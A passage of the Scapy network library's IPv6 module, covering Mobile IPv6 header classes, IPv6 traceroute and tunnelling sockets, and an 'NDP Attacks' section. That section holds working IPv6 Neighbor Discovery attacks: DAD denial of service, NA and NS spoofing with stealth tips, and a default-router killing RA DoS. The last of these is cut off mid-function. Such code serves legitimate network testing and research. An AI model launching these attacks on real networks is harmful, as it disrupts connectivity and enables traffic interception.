    """Mobility Header - Home Test Init (mhtype 1)."""

    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 1, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrFixedLenField("reserved", b"\x00" * 2, 2),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 16,
                      length_from=lambda pkt: 8 * (pkt.len - 1)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the cookie (as bytes), used to pair request and reply."""
        return bytes_encode(self.cookie)

3274 

3275 

class MIP6MH_CoTI(MIP6MH_HoTI):
    """Mobility Header - Care-of Test Init: a HoTI with mhtype preset to 2."""

    name = "IPv6 Mobility Header - Care-of Test Init"
    mhtype = 2

    def hashret(self):
        """Return the cookie (as bytes), used to pair request and reply."""
        return bytes_encode(self.cookie)

3282 

3283 

class MIP6MH_HoT(_MobilityHeader):
    """Mobility Header - Home Test (mhtype 3)."""

    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 3, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("index", None),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        StrFixedLenField("token", b"\x00" * 8, 8),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda pkt: 8 * (pkt.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the cookie (as bytes), used to pair request and reply."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if ``other`` is a HoTI carrying the same cookie, else 0."""
        same_exchange = (isinstance(other, MIP6MH_HoTI) and
                         self.cookie == other.cookie)
        return 1 if same_exchange else 0

3307 

3308 

class MIP6MH_CoT(MIP6MH_HoT):
    """Mobility Header - Care-of Test: a HoT with mhtype preset to 4."""

    name = "IPv6 Mobility Header - Care-of Test"
    mhtype = 4

    def hashret(self):
        """Return the cookie (as bytes), used to pair request and reply."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if ``other`` is a CoTI carrying the same cookie, else 0."""
        same_exchange = (isinstance(other, MIP6MH_CoTI) and
                         self.cookie == other.cookie)
        return 1 if same_exchange else 0

3321 

3322 

class LifetimeField(ShortField):
    """16-bit lifetime stored in units of 4 seconds."""

    def i2repr(self, pkt, x):
        """Render the stored value ``x`` as a number of seconds."""
        seconds = 4 * x
        return "%d sec" % seconds

3326 

3327 

class MIP6MH_BU(_MobilityHeader):
    """Mobility Header - Binding Update (mhtype 5)."""

    name = "IPv6 Mobility Header - Binding Update"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 5, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        XShortField("seq", None),  # TODO: ShortNonceField
        FlagsField("flags", "KHA", 7, "PRMKLHA"),
        XBitField("reserved", 0, 9),
        LifetimeField("mhtime", 3),  # unit == 4 seconds
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda pkt: 8 * pkt.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
        """Return the constant hash shared by BRR, BU and BA."""
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 if ``other`` is a Binding Refresh Request, else 0."""
        return 1 if isinstance(other, MIP6MH_BRR) else 0

3351 

3352 

class MIP6MH_BA(_MobilityHeader):
    """Mobility Header - Binding Acknowledgement (mhtype 6)."""

    name = "IPv6 Mobility Header - Binding ACK"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
                   ByteEnumField("mhtype", 6, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   ByteEnumField("status", 0, bastatus),
                   FlagsField("flags", "K", 3, "PRK"),
                   XBitField("res2", None, 5),
                   XShortField("seq", None),  # TODO: ShortNonceField
                   XShortField("mhtime", 0),  # unit == 4 seconds
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
                   _OptionsField("options", [], MIP6OptUnknown, 12,
                                 length_from=lambda pkt: 8 * pkt.len - 4)]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
        """Return the constant hash shared by BRR, BU and BA."""
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 if this BA acknowledges the Binding Update ``other``.

        ``other`` must be a BU (mhtype 5) that requested an acknowledgement
        and carries the same sequence number as this BA (mhtype 6).
        """
        # The BU flags are declared as "PRMKLHA", least significant bit
        # first, so the Acknowledge bit 'A' is bit 6 (0x40). The previous
        # test against 0x1 was checking the 'P' bit instead, which made a
        # default BU (flags "KHA") impossible to match.
        ack_requested = 0x40
        if (isinstance(other, MIP6MH_BU) and
                other.mhtype == 5 and
                self.mhtype == 6 and
                other.flags & ack_requested and
                self.seq == other.seq):
            return 1
        return 0

3381 

3382 

3383_bestatus = {1: 'Unknown binding for Home Address destination option', 

3384 2: 'Unrecognized MH Type value'} 

3385 

3386# TODO: match Binding Error to its stimulus 

3387 

3388 

class MIP6MH_BE(_MobilityHeader):
    """Mobility Header - Binding Error (mhtype 7)."""

    name = "IPv6 Mobility Header - Binding Error"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 7, mhtypes),
        ByteField("res", 0),
        XShortField("cksum", None),
        ByteEnumField("status", 0, _bestatus),
        ByteField("reserved", 0),
        IP6Field("ha", "::"),
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda pkt: 8 * (pkt.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

3402 

3403 

# Mobility Header type -> class implementing that message.
_mip6_mhtype2cls = {
    0: MIP6MH_BRR,
    1: MIP6MH_HoTI,
    2: MIP6MH_CoTI,
    3: MIP6MH_HoT,
    4: MIP6MH_CoT,
    5: MIP6MH_BU,
    6: MIP6MH_BA,
    7: MIP6MH_BE,
}

3412 

3413 

3414############################################################################# 

3415############################################################################# 

3416# Traceroute6 # 

3417############################################################################# 

3418############################################################################# 

3419 

class AS_resolver6(AS_resolver_riswhois):
    """RIS whois AS resolver aware of 6to4 and Teredo IPv6 addresses."""

    def _resolve_one(self, ip):
        """
        Resolve the AS of ``ip`` and return ``(ip, asn, desc)``.

        For a 6to4 or Teredo address the whois lookup is done on the
        embedded IPv4 address; any other address is looked up as is.
        An AS number of the form "AS<digits>" is converted to an int.
        """
        if in6_isaddr6to4(ip):
            # for 6to4, the IPv4 address sits in bytes 2 to 5
            packed = inet_pton(socket.AF_INET6, ip)
            lookup = inet_ntop(socket.AF_INET, packed[2:6])
        elif in6_isaddrTeredo(ip):
            # for Teredo, use the mapped address
            lookup = teredoAddrExtractInfo(ip)[2]
        else:
            lookup = ip

        _, asn, desc = AS_resolver_riswhois._resolve_one(self, lookup)

        if asn.startswith("AS"):
            try:
                asn = int(asn[2:])
            except ValueError:
                # not a plain number: keep the string untouched
                pass

        return ip, asn, desc

3445 

3446 

class TracerouteResult6(TracerouteResult):
    """Traceroute results for IPv6 probes."""

    __slots__ = []

    def show(self):
        """Display the results as a table: one column per probed
        destination, one row per hop limit."""

        def _cell(s, r):
            # (column, row, content) for one (probe, answer) couple
            # TODO: ICMPv6 !
            column = s.sprintf(
                "%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"  # noqa: E501
            )
            content = r.sprintf(
                "%-42s,IPv6.src% {TCP:%TCP.flags%}"
                "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"
                "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"
                "{ICMPv6EchoReply:%ir,type%}"
            )
            return column, s.hlim, content

        return self.make_table(_cell)

    def get_trace(self):
        """Return ``{destination: {hop limit: (source, final)}}``.

        ``final`` is False when the answer is one of the ICMPv6 error
        messages listed below. For each destination, hops beyond the
        first final answer are discarded.
        """
        error_layers = (ICMPv6TimeExceeded, ICMPv6DestUnreach,
                        ICMPv6PacketTooBig, ICMPv6ParamProblem)
        trace = {}

        for s, r in self.res:
            if IPv6 not in s:
                continue
            hops = trace.setdefault(s[IPv6].dst, {})
            final = not any(layer in r for layer in error_layers)
            hops[s[IPv6].hlim] = r[IPv6].src, final

        for hops in trace.values():
            try:
                first_final = min(hlim for hlim, info in hops.items()
                                  if info[1])
            except ValueError:
                # no final answer for this destination: keep everything
                continue
            # collect the keys first: the dict is modified afterwards
            for hlim in [h for h in hops if h > first_final]:
                del hops[hlim]

        return trace

    def graph(self, ASres=AS_resolver6(), **kargs):
        """Call TracerouteResult.graph() with an IPv6-aware AS resolver
        as the default ``ASres``."""
        TracerouteResult.graph(self, ASres=ASres, **kargs)

3488 

3489 

@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
                l4=None, timeout=2, verbose=None, **kargs):
    """Instant TCP traceroute using IPv6

    Probes are sent to ``target`` with every hop limit from ``minttl`` to
    ``maxttl``. They are TCP segments to ``dport`` unless ``l4`` provides
    another layer to put above IPv6. Extra keyword arguments are passed
    to sr().

    Returns a ``(TracerouteResult6, unanswered)`` tuple; the result is
    also displayed when ``verbose`` (``conf.verb`` by default) is true.
    """
    if verbose is None:
        verbose = conf.verb

    base = IPv6(dst=target, hlim=(minttl, maxttl))
    if l4 is None:
        probes = base / TCP(seq=RandInt(), sport=sport, dport=dport)
        answered, unanswered = sr(probes, timeout=timeout,
                                  filter="icmp6 or tcp",
                                  verbose=verbose, **kargs)
    else:
        answered, unanswered = sr(base / l4, timeout=timeout,
                                  verbose=verbose, **kargs)

    result = TracerouteResult6(answered.res)
    if verbose:
        result.show()

    return result, unanswered

3512 

3513############################################################################# 

3514############################################################################# 

3515# Sockets # 

3516############################################################################# 

3517############################################################################# 

3518 

3519 

if not WINDOWS:
    from scapy.supersocket import L3RawSocket

    class L3RawSocket6(L3RawSocket):
        """Layer 3 raw socket sending IPv6 packets.

        The ``filter``, ``promisc`` and ``nofilter`` arguments are accepted
        but not used by this constructor.
        """

        def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):  # noqa: E501
            # NOTE: if fragmentation is needed, it will be done by the
            # kernel (RFC 2292)
            self.outs = socket.socket(
                socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW
            )
            self.ins = socket.socket(
                socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)
            )
            self.iface = iface

3529 

3530 

def IPv6inIP(dst='203.178.135.36', src=None):
    """Configure the IPv6-in-IPv4 socket class and return it.

    ``dst`` and ``src`` are stored on ``_IPv6inIP`` as the IPv4 tunnel
    endpoints. If ``conf.L3socket`` already is ``_IPv6inIP``, the setting
    is deleted from ``conf``; otherwise the current ``conf.L3socket`` is
    remembered as the class used to carry the IPv4 packets.
    """
    _IPv6inIP.dst = dst
    _IPv6inIP.src = src
    if conf.L3socket == _IPv6inIP:
        del conf.L3socket
    else:
        _IPv6inIP.cls = conf.L3socket
    return _IPv6inIP

3539 

3540 

class _IPv6inIP(SuperSocket):
    """Socket tunnelling IPv6 packets inside IPv4 (protocol IPPROTO_IPV6).

    The actual I/O is delegated to ``worker``, an instance of ``cls``.
    """

    dst = '127.0.0.1'  # IPv4 address of the remote tunnel endpoint
    src = None         # IPv4 source address set on sent packets
    cls = None         # socket class instantiated as the worker

    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):  # noqa: E501
        SuperSocket.__init__(self, family, type, proto)
        self.worker = self.cls(**args)

    def set(self, dst, src=None):
        """Change the tunnel endpoints (stored at class level)."""
        _IPv6inIP.src = src
        _IPv6inIP.dst = dst

    def nonblock_recv(self):
        """Non-blocking receive through the worker socket."""
        return self._recv(self.worker.nonblock_recv())

    def recv(self, x):
        """Receive through the worker socket, reading at most ``x`` bytes."""
        return self._recv(self.worker.recv(x), x)

    def _recv(self, p, x=MTU):
        """Return the inner IPv6 packet when ``p`` is a tunnelled packet
        coming from ``dst``; otherwise return ``p`` unchanged (``x`` is
        not used)."""
        # TODO: verify checksum
        tunnelled = (p is not None and
                     isinstance(p, IP) and
                     p.src == self.dst and
                     p.proto == socket.IPPROTO_IPV6 and
                     isinstance(p.payload, IPv6))
        if tunnelled:
            return p.payload
        return p

    def send(self, x):
        """Send ``x`` wrapped in an IPv4 header towards ``dst``."""
        outer = IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)
        return self.worker.send(outer / x)

3574 

3575 

3576############################################################################# 

3577############################################################################# 

3578# Neighbor Discovery Protocol Attacks # 

3579############################################################################# 

3580############################################################################# 

3581 

def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
                        tgt_filter=None, reply_mac=None):
    """
    Internal generic helper accepting a specific callback as first argument,
    for NS or NA reply. See the two specific functions below.

    It sniffs on ``iface`` (``conf.iface`` by default) and calls
    ``reply_callback(req, reply_mac, iface)`` for every Neighbor
    Solicitation that looks like a DAD probe and passes the optional
    ``mac_src_filter`` / ``tgt_filter`` filters. ``reply_mac`` defaults to
    the hardware address of ``iface``.

    ``tgt_filter`` may be given as an IPv6 address string; it is converted
    to its packed form before being compared with the packed target
    address (a string used to never match). A packed ``bytes`` value is
    used unchanged.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        # Get and compare the MAC address
        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must be the unspecified address
        if req[IPv6].src != "::":
            return 0

        # Check destination is the link-local solicited-node multicast
        # address associated with target address in received NS
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0
        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
        expected_snma = in6_getnsma(tgt)
        if received_snma != expected_snma:
            return 0

        return 1

    if not iface:
        iface = conf.iface

    # is_request() compares packed addresses: bring a textual filter to
    # the same representation, once, before sniffing starts.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, iface),
          iface=iface)

3632 

3633 

def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756: listen for NS messages sent from the unspecified address and
    answer each of them with a NS for the same target address, so that the
    peer believes another node is performing DAD for that address too.

    The fake NS is built with:
     - the target address found in the received NS as target address;
     - the unspecified address (::) as IPv6 source address;
     - the IPv6 destination address of the received NS (the link-local
       solicited-node multicast address of the target) as destination;
     - the mac address of the interface (or reply_mac, see below) as
       source mac address;
     - a destination mac address that is not set explicitly.

    The behavior can be tuned with the following arguments:

    iface: the interface (e.g. "eth0") on which the DoS is launched.
           conf.iface is used when None is provided.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source trigger a reply,
         which limits the DoS to a single victim. The default value,
         None, does not restrict the source.

    tgt_filter: same as above, but applied to the target address carried
         in the received NS (not to its IPv6 destination address).

    reply_mac: the source mac address to use in the replies instead of
         the mac address of the interface.
    """

    def ns_reply_callback(req, reply_mac, iface):
        """
        Callback answering a NS with a similar NS
        """
        sender_mac = req[Ether].src
        target = req[ICMPv6ND_NS].tgt

        # Let's build a reply and send it
        reply = Ether(src=reply_mac)
        reply = reply / IPv6(src="::", dst=req[IPv6].dst)
        reply = reply / ICMPv6ND_NS(tgt=target)
        sendp(reply, iface=iface, verbose=0)

        print("Reply NS for target address %s (received from %s)" % (target, sender_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)

3688 

3689 

def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756. This is done by listening incoming NS messages *sent from the
    unspecified address* and sending a NA reply for the target address,
    leading the peer to believe that the address it is testing is already
    in use on the link.

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address found in received NS.
     - as IPv6 destination address: the destination address of the received
       NS (expected to be the link-local solicited-node multicast address
       derived from the target address).
     - the mac address of the interface as source (or reply_mac, see below).
     - no explicit destination mac address: it is left to Scapy to derive
       it from the IPv6 destination address.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
       with the mac address used as source of the NA.

    The listening and filtering part is delegated to _NDP_Attack_DAD_DoS(),
    which receives the arguments below unchanged:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.
    """

    def na_reply_callback(req, reply_mac, iface):
        """
        Answer the NS carried by req with a forged NA for the same target
        """

        solicited_tgt = req[ICMPv6ND_NS].tgt
        requester_mac = req[Ether].src

        # The NA claims the solicited address as its own source, is sent to
        # the IPv6 destination of the NS, and has only the Override flag set.
        forged_na = (
            Ether(src=reply_mac) /
            IPv6(src=solicited_tgt, dst=req[IPv6].dst) /
            ICMPv6ND_NA(tgt=solicited_tgt, S=0, R=0, O=1) /  # noqa: E741
            ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
        )
        sendp(forged_na, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" %
              (solicited_tgt, requester_mac))

    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)

3749 

3750 

def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
                           reply_mac=None, router=False):
    """
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor Advertisement
    is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function sends
    advertisements in response to received NS (NS sent as part of the DAD,
    i.e. with an unspecified address as source, are not considered).

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address
     - as IPv6 destination address: the source IPv6 address of received NS
       message.
     - the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination mac address
       of the emitted NA.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
       filled with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS. The address
         can be given in printable form (e.g. "2001:db8::1") or already
         packed in network format (16 bytes).

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.

    router: by default (False) the 'R' flag in the NA used for the reply
         is not set. If the parameter is set to True, the 'R' flag in the
         NA is set, advertising us as a router.

    Please, keep the following in mind when using the function: for obvious
    reasons (kernel space vs. Python speed), when the target of the address
    resolution is on the link, the sender of the NS receives 2 NA messages
    in a row, the valid one and our fake one. The second one will overwrite
    the information provided by the first one, i.e. the natural latency of
    Scapy helps here.

    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come after
    something 20+ ms. On a usual testbed for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request

        tgt_filter, when set, must be in packed (network) format because it
        is compared with the packed target address of the NS.
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must NOT be the unspecified address
        if req[IPv6].src == "::":
            return 0

        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0

        dst = req[IPv6].dst
        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.

            # If this is a real address resolution NS, then the destination
            # address of the packet is the link-local solicited node multicast
            # address associated with the target of the NS.
            # Otherwise, the NS is a NUD related one, i.e. the peer is
            # unicasting the NS to check the target is still alive (L2
            # information is still in its cache and it is verified)
            received_snma = inet_pton(socket.AF_INET6, dst)
            expected_snma = in6_getnsma(tgt)
            if received_snma != expected_snma:
                print("solicited node multicast @ does not match target @!")
                return 0

        return 1

    def reply_callback(req, reply_mac, router, iface):
        """
        Callback that reply to a NS with a spoofed NA
        """

        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
        # send it back.
        mac = req[Ether].src
        src = req[IPv6].src
        tgt = req[ICMPv6ND_NS].tgt
        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
        # Use the target field from the NS
        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741

        # "If the solicitation IP Destination Address is not a multicast
        # address, the Target Link-Layer Address option MAY be omitted"
        # Given our purpose, we always include it.
        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)

        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, mac))

    # is_request() compares tgt_filter with the *packed* target address of
    # the NS. A filter given in printable form would therefore never match,
    # so convert it once here. Values that are not str (i.e. an already
    # packed address) are left untouched.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    router = 1 if router else 0  # Value of the R flags in NA

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, router, iface),
          iface=iface)

3887 

3888 

def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
                           dst=None, src_mac=None, dst_mac=None, loop=True,
                           inter=1, iface=None):
    """
    Send fake Neighbor Solicitation messages to a victim, in order to either
    create a new entry in its neighbor cache or update an existing one. In
    section 7.2.3 of RFC 4861, it is stated that a node SHOULD create the
    entry or update an existing one (if it is not currently performing DAD
    for the target of the NS). The entry's reachability state is set to
    STALE.

    The two main parameters of the function are the source link-layer address
    (carried by the Source Link-Layer Address option in the NS) and the
    source address of the packet.

    Unlike some other NDP_Attack_* functions, this one is not based on a
    stimulus/response model. When called, it sends the same NS packet in loop
    every second (the default).

    Following arguments can be used to change the format of the packets:

    src_lladdr: the MAC address used in the Source Link-Layer Address option
         included in the NS packet. This is the address that the peer should
         associate in its neighbor cache with the IPv6 source address of the
         packet. If None is provided, the mac address of the interface is
         used.

    src: the IPv6 address used as source of the packet. If None is provided,
         the source field is not set explicitly and is left to Scapy to
         select.

    target: the target address of the NS packet. If no value is provided,
         a dummy address (2001:db8::1) is used. The value of the target
         has a direct impact on the destination address of the packet if it
         is not overridden. By default, the solicited-node multicast address
         associated with the target is used as destination address of the
         packet. Consider specifying a specific destination address if you
         intend to use a target address different than the one of the victim.

    dst: The destination address of the NS. By default, the solicited node
         multicast address associated with the target address (see previous
         parameter) is used if no specific value is provided. The victim
         is not expected to check the destination address of the packet,
         so using a multicast address like ff02::1 should work if you want
         the attack to target all hosts on the link. On the contrary, if
         you want to be more stealth, you should provide the target address
         for this parameter in order for the packet to be sent only to the
         victim.

    src_mac: the MAC address used as source of the packet. If None is
         provided, the Ethernet source field is not set explicitly. If you
         want to be more stealth, feel free to use something else. Note
         that this address is not the one that the victim will use to
         populate its neighbor cache.

    dst_mac: The MAC address used as destination address of the packet. If
         None is provided, the Ethernet destination field is not set
         explicitly and is left to Scapy to resolve. If you want the attack
         to be stealth, you can provide the MAC address using this
         parameter.

    loop: By default, this parameter is True, indicating that NS packets
         will be sent in loop, separated by 'inter' seconds (see below).
         When set to False, a single packet is sent.

    inter: When loop parameter is True (the default), this parameter provides
         the interval in seconds used for sending NS packets.

    iface: to force the sending interface. If None is provided conf.iface
         is used.
    """

    iface = iface or conf.iface

    # The Source Link-Layer Address option carries the provided MAC address,
    # or the one of the emitting interface when none was given.
    src_lladdr = src_lladdr or get_if_hwaddr(iface)

    # Only explicitly provided Ethernet fields are set.
    l2_fields = {name: value
                 for name, value in (("src", src_mac), ("dst", dst_mac))
                 if value}

    if dst:
        ip_dst = dst
    else:
        # Fall back on the solicited-node multicast address associated
        # with the target address.
        packed_target = inet_pton(socket.AF_INET6, target)
        ip_dst = inet_ntop(socket.AF_INET6, in6_getnsma(packed_target))

    l3_fields = {"src": src, "dst": ip_dst} if src else {"dst": ip_dst}

    solicitation = (
        Ether(**l2_fields) /
        IPv6(**l3_fields) /
        ICMPv6ND_NS(tgt=target) /
        ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
    )

    sendp(solicitation, inter=inter, loop=loop, iface=iface, verbose=0)

3994 

3995 

def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    The purpose of the function is to monitor incoming RA messages
    sent by default routers (RA with a non-zero Router Lifetime values)
    and invalidate them by immediately replying with fake RA messages
    advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to allow
    filtering RA sent by specific routers (Ethernet source address).
    With regard to emission, the multicast all-nodes address is used
    by default but a specific target can be used, in order for the DoS to
    apply only to a specific host.

    More precisely, following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will trigger
         replies. If other default routers advertised their presence on the
         link, their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific IPv6 source
         address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address. The
         IPv6 destination address remains the all-nodes address (ff02::1).
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Check if packet req is a request
        """

        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        ip_src = req[IPv6].src
        if ip_src_filter and ip_src != ip_src_filter:
            return 0

        # Check if this is an advertisement for a Default Router
        # by looking at Router Lifetime value
        if req[ICMPv6ND_RA].routerlifetime == 0:
            return 0

        return 1

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Callback that sends an RA with a 0 lifetime
        """

        # Let's build a reply and send it

        src = req[IPv6].src

        # Prepare packets parameters
        ether_params = {}
        if reply_mac:
            ether_params["src"] = reply_mac

        if tgt_mac:
            ether_params["dst"] = tgt_mac

        # Pick the link-layer address advertised by the router *before*
        # extracting the PIOs below: that extraction removes payloads from
        # the layers of req, so a Source Link-Layer Address option located
        # after a Prefix Information option would no longer be found.
        if ICMPv6NDOptSrcLLAddr in req:
            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            mac = req[Ether].src

        # Basis of fake RA (high pref, zero lifetime)
        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)

